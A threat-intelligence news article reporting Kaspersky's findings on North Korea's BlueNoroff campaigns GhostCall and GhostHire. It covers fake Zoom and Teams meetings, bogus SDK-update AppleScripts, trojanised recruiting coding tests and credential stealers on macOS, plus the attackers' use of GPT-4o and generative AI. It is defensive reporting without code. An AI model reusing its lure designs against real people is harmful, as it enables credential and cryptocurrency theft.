BlueNoroff APT Launches AI-Enhanced Espionage on macOS, Using GPT-4o Images in Fake GhostCall Meetings

The North Korean APT group BlueNoroff — also known as Sapphire Sleet, APT38, Alluring Pisces, Stardust Chollima, and TA444 — has launched two intertwined cyber-espionage and financial-theft campaigns under its long-running SnatchCrypto operation. According to a new report from Kaspersky, the campaigns, dubbed GhostCall and GhostHire, demonstrate the actor’s escalating sophistication, shifting fully to macOS and integrating AI-generated content to enhance social-engineering realism.

The GhostCall operation targets blockchain executives and venture-capital leaders by inviting them to join seemingly legitimate Zoom or Microsoft Teams meetings. Kaspersky explains that “the GhostCall campaign is a sophisticated attack that uses fake online calls with the threat actors posing as fake entrepreneurs or investors to convince targets.” Once a victim joins, prerecorded videos of previous victims are played to create the illusion of a live discussion, while a fraudulent prompt urges the participant to “update the Zoom SDK.”

That “update” is a malicious AppleScript that downloads further payloads. Kaspersky’s researchers describe how “the actor reaches out to targets on Telegram by impersonating venture capitalists and, in some cases, using compromised accounts of real entrepreneurs and startup founders.” The fake sites replicate Zoom’s interface with near-pixel accuracy, including live camera and name prompts to maintain authenticity.

The campaign has gradually migrated from Zoom to Microsoft Teams, signaling adaptability to corporate trends and suggesting the attackers’ deep understanding of business collaboration tools.

Kaspersky’s analysis reveals an intricate web of multi-stage infection chains, each modularly constructed to evade detection. The firm identified at least seven distinct sequences — including DownTroy, CosmicDoor, RooTroy, SneakMain, and RealTimeTroy — along with a keylogger and a stealer suite named SilentSiphon.

The SilentSiphon suite is described as “a collection of Bash shell scripts used to collect and exfiltrate data to the actor’s C2 servers.” It targets credentials, API keys, cryptocurrency wallets, DevOps configurations, and even OpenAI API tokens, effectively granting the attackers potential access to both personal and enterprise infrastructure.

Notably, BlueNoroff’s engineers have transitioned from Rust to Nim, employing C++, Go, Swift, and Python to diversify their malware base. This “language agility” complicates attribution and hampers antivirus detection, underscoring the group’s resource depth.

While the GhostCall operation relies on prerecorded videos instead of deepfakes, Kaspersky uncovered that BlueNoroff enhances stolen or scraped profile images using GPT-4o. The report states, “Some of these images were enhanced with GPT-4o. Since OpenAI implemented the C2PA standard specification metadata to identify the generated images as artificial, the images created via ChatGPT include metadata that indicates their synthetic origin.”

This hybrid use of real footage and AI-polished visuals blurs authenticity lines, making the attacks nearly indistinguishable from legitimate investor interactions. The group also appears to employ AI-written code snippets within malware modules — a rare glimpse into automated offensive scripting. Kaspersky observed that “the secrets stealer module includes several comment lines, one of them using a checkmark emoticon — suggesting BlueNoroff uses generative AI to write malicious scripts.”

The GhostHire campaign parallels GhostCall’s tactics but masquerades as recruitment outreach. Developers and engineers receive Telegram messages from “recruiters” posing as representatives of major fintech firms. Victims are sent a coding challenge via Telegram bot or GitHub repository and pressured to finish within 30 minutes — a psychological trick that boosts infection success.

The malicious Go project imports a fake dependency named uniroute, which decodes a base64-encoded URL and downloads OS-specific payloads. On macOS, these payloads again deploy DownTroy, connecting both campaigns into a cohesive ecosystem.

Kaspersky notes that “the project delivered through the ZIP file appears to be a legitimate DeFi-related project written in Go, aiming at routing cryptocurrency transactions across various protocols,” but the hidden dependency injects the malware into the target’s system.

Among the discovered chains, DownTroy stands out as the main downloader and persistence enabler. By abusing macOS’s Transparency, Consent, and Control (TCC) framework, it can silently grant automation and file-access permissions without user consent. Other modules like ZoomClutch mimic legitimate applications, prompt for system passwords, and exfiltrate them to C2 servers.

Kaspersky confirms that “ZoomClutch steals macOS passwords by displaying a fake Zoom dialog, then sends the captured credentials to the C2 server.”

Once known for cryptocurrency theft, BlueNoroff now operates with the precision of an AI-driven cyber-espionage unit, merging social engineering, cross-platform development, and artificial intelligence.

Kaspersky concludes its analysis with a warning: “We observed the actor utilizing AI in various aspects of their attacks, which enabled them to enhance productivity and meticulously refine their attacks.”

Related Posts:

• New Mirai Botnet Variants with AI-Powered Attacks Observed
• North Korea’s AI-Powered Cybercrime: Deepfakes & Fake Personas Infiltrate 300+ US Companies via Remote IT Jobs
• BlueNoroff’s New MacOS Threat: “Hidden Risk” Targets Crypto Enthusiasts
• Crypto-Targeting BlueNoroff APT Expands Arsenal with New macOS Malware
• Jamf Threat Labs Uncovers a Stealthy Malware Strain from BlueNoroff APT